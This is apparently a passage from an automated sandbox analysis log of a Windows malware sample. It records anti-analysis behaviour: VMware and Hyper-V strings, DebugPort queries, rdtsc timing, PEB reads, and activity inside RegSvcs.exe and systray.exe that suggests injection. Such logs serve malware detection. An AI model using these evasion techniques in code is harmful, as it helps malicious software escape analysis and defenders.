Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\22#U0415.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\AppxSip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\catroot2	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\ccdc87283bb430dd204d0f658bca1ec9\Microsoft.Management.Infrastructure.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\OpcServices.DLL	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\wshext.dll	Jump to behavior

Source: explorer.exe, 00000007.00000002.2878663104.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000007.00000000.1656778904.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000007.00000000.1656778904.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000007.00000000.1654571205.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000007.00000002.2878663104.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000007.00000002.2870031242.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000007.00000000.1654571205.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.2878663104.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000007.00000000.1654571205.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000007.00000000.1656778904.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000007.00000000.1656778904.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2877317802.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2877317802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1656778904.000000000982D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000002.2878663104.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000007.00000000.1654571205.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2873939169.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000007.00000000.1656778904.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000007.00000002.2870031242.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000007.00000002.2870031242.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\22#U0415.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 6_2_00409AA0 rdtsc

6_2_00409AA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 6_2_0040ACE0 LdrLoadDll,

6_2_0040ACE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EC156 mov eax, dword ptr fs:[00000030h]	6_2_015EC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C4164 mov eax, dword ptr fs:[00000030h]	6_2_016C4164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C4164 mov eax, dword ptr fs:[00000030h]	6_2_016C4164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F6154 mov eax, dword ptr fs:[00000030h]	6_2_015F6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F6154 mov eax, dword ptr fs:[00000030h]	6_2_015F6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01684144 mov eax, dword ptr fs:[00000030h]	6_2_01684144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01684144 mov eax, dword ptr fs:[00000030h]	6_2_01684144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01684144 mov ecx, dword ptr fs:[00000030h]	6_2_01684144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01684144 mov eax, dword ptr fs:[00000030h]	6_2_01684144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01684144 mov eax, dword ptr fs:[00000030h]	6_2_01684144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01688158 mov eax, dword ptr fs:[00000030h]	6_2_01688158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01620124 mov eax, dword ptr fs:[00000030h]	6_2_01620124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169E10E mov eax, dword ptr fs:[00000030h]	6_2_0169E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169E10E mov ecx, dword ptr fs:[00000030h]	6_2_0169E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169E10E mov eax, dword ptr fs:[00000030h]	6_2_0169E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169E10E mov eax, dword ptr fs:[00000030h]	6_2_0169E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169E10E mov ecx, dword ptr fs:[00000030h]	6_2_0169E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169E10E mov eax, dword ptr fs:[00000030h]	6_2_0169E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169E10E mov eax, dword ptr fs:[00000030h]	6_2_0169E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169E10E mov ecx, dword ptr fs:[00000030h]	6_2_0169E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169E10E mov eax, dword ptr fs:[00000030h]	6_2_0169E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169E10E mov ecx, dword ptr fs:[00000030h]	6_2_0169E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169A118 mov ecx, dword ptr fs:[00000030h]	6_2_0169A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169A118 mov eax, dword ptr fs:[00000030h]	6_2_0169A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169A118 mov eax, dword ptr fs:[00000030h]	6_2_0169A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169A118 mov eax, dword ptr fs:[00000030h]	6_2_0169A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B0115 mov eax, dword ptr fs:[00000030h]	6_2_016B0115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C61E5 mov eax, dword ptr fs:[00000030h]	6_2_016C61E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016201F8 mov eax, dword ptr fs:[00000030h]	6_2_016201F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B61C3 mov eax, dword ptr fs:[00000030h]	6_2_016B61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B61C3 mov eax, dword ptr fs:[00000030h]	6_2_016B61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166E1D0 mov eax, dword ptr fs:[00000030h]	6_2_0166E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166E1D0 mov eax, dword ptr fs:[00000030h]	6_2_0166E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166E1D0 mov ecx, dword ptr fs:[00000030h]	6_2_0166E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166E1D0 mov eax, dword ptr fs:[00000030h]	6_2_0166E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166E1D0 mov eax, dword ptr fs:[00000030h]	6_2_0166E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EA197 mov eax, dword ptr fs:[00000030h]	6_2_015EA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EA197 mov eax, dword ptr fs:[00000030h]	6_2_015EA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EA197 mov eax, dword ptr fs:[00000030h]	6_2_015EA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016AC188 mov eax, dword ptr fs:[00000030h]	6_2_016AC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016AC188 mov eax, dword ptr fs:[00000030h]	6_2_016AC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01630185 mov eax, dword ptr fs:[00000030h]	6_2_01630185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01694180 mov eax, dword ptr fs:[00000030h]	6_2_01694180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01694180 mov eax, dword ptr fs:[00000030h]	6_2_01694180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167019F mov eax, dword ptr fs:[00000030h]	6_2_0167019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167019F mov eax, dword ptr fs:[00000030h]	6_2_0167019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167019F mov eax, dword ptr fs:[00000030h]	6_2_0167019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167019F mov eax, dword ptr fs:[00000030h]	6_2_0167019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F2050 mov eax, dword ptr fs:[00000030h]	6_2_015F2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161C073 mov eax, dword ptr fs:[00000030h]	6_2_0161C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01676050 mov eax, dword ptr fs:[00000030h]	6_2_01676050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01686030 mov eax, dword ptr fs:[00000030h]	6_2_01686030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01674000 mov ecx, dword ptr fs:[00000030h]	6_2_01674000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01692000 mov eax, dword ptr fs:[00000030h]	6_2_01692000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01692000 mov eax, dword ptr fs:[00000030h]	6_2_01692000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01692000 mov eax, dword ptr fs:[00000030h]	6_2_01692000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01692000 mov eax, dword ptr fs:[00000030h]	6_2_01692000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01692000 mov eax, dword ptr fs:[00000030h]	6_2_01692000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01692000 mov eax, dword ptr fs:[00000030h]	6_2_01692000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01692000 mov eax, dword ptr fs:[00000030h]	6_2_01692000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01692000 mov eax, dword ptr fs:[00000030h]	6_2_01692000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160E016 mov eax, dword ptr fs:[00000030h]	6_2_0160E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160E016 mov eax, dword ptr fs:[00000030h]	6_2_0160E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160E016 mov eax, dword ptr fs:[00000030h]	6_2_0160E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160E016 mov eax, dword ptr fs:[00000030h]	6_2_0160E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EA020 mov eax, dword ptr fs:[00000030h]	6_2_015EA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EC020 mov eax, dword ptr fs:[00000030h]	6_2_015EC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016760E0 mov eax, dword ptr fs:[00000030h]	6_2_016760E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016320F0 mov ecx, dword ptr fs:[00000030h]	6_2_016320F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EC0F0 mov eax, dword ptr fs:[00000030h]	6_2_015EC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F80E9 mov eax, dword ptr fs:[00000030h]	6_2_015F80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016720DE mov eax, dword ptr fs:[00000030h]	6_2_016720DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EA0E3 mov ecx, dword ptr fs:[00000030h]	6_2_015EA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016880A8 mov eax, dword ptr fs:[00000030h]	6_2_016880A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B60B8 mov eax, dword ptr fs:[00000030h]	6_2_016B60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B60B8 mov ecx, dword ptr fs:[00000030h]	6_2_016B60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F208A mov eax, dword ptr fs:[00000030h]	6_2_015F208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015E80A0 mov eax, dword ptr fs:[00000030h]	6_2_015E80A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169437C mov eax, dword ptr fs:[00000030h]	6_2_0169437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C634F mov eax, dword ptr fs:[00000030h]	6_2_016C634F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01672349 mov eax, dword ptr fs:[00000030h]	6_2_01672349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BA352 mov eax, dword ptr fs:[00000030h]	6_2_016BA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01698350 mov ecx, dword ptr fs:[00000030h]	6_2_01698350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167035C mov eax, dword ptr fs:[00000030h]	6_2_0167035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167035C mov eax, dword ptr fs:[00000030h]	6_2_0167035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167035C mov eax, dword ptr fs:[00000030h]	6_2_0167035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167035C mov ecx, dword ptr fs:[00000030h]	6_2_0167035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167035C mov eax, dword ptr fs:[00000030h]	6_2_0167035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167035C mov eax, dword ptr fs:[00000030h]	6_2_0167035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C8324 mov eax, dword ptr fs:[00000030h]	6_2_016C8324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C8324 mov ecx, dword ptr fs:[00000030h]	6_2_016C8324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C8324 mov eax, dword ptr fs:[00000030h]	6_2_016C8324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C8324 mov eax, dword ptr fs:[00000030h]	6_2_016C8324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EC310 mov ecx, dword ptr fs:[00000030h]	6_2_015EC310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162A30B mov eax, dword ptr fs:[00000030h]	6_2_0162A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162A30B mov eax, dword ptr fs:[00000030h]	6_2_0162A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162A30B mov eax, dword ptr fs:[00000030h]	6_2_0162A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01610310 mov ecx, dword ptr fs:[00000030h]	6_2_01610310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016003E9 mov eax, dword ptr fs:[00000030h]	6_2_016003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016003E9 mov eax, dword ptr fs:[00000030h]	6_2_016003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016003E9 mov eax, dword ptr fs:[00000030h]	6_2_016003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016003E9 mov eax, dword ptr fs:[00000030h]	6_2_016003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016003E9 mov eax, dword ptr fs:[00000030h]	6_2_016003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016003E9 mov eax, dword ptr fs:[00000030h]	6_2_016003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016003E9 mov eax, dword ptr fs:[00000030h]	6_2_016003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016003E9 mov eax, dword ptr fs:[00000030h]	6_2_016003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0160E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0160E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0160E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016263FF mov eax, dword ptr fs:[00000030h]	6_2_016263FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F83C0 mov eax, dword ptr fs:[00000030h]	6_2_015F83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F83C0 mov eax, dword ptr fs:[00000030h]	6_2_015F83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F83C0 mov eax, dword ptr fs:[00000030h]	6_2_015F83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F83C0 mov eax, dword ptr fs:[00000030h]	6_2_015F83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA3C0 mov eax, dword ptr fs:[00000030h]	6_2_015FA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA3C0 mov eax, dword ptr fs:[00000030h]	6_2_015FA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA3C0 mov eax, dword ptr fs:[00000030h]	6_2_015FA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA3C0 mov eax, dword ptr fs:[00000030h]	6_2_015FA3C0
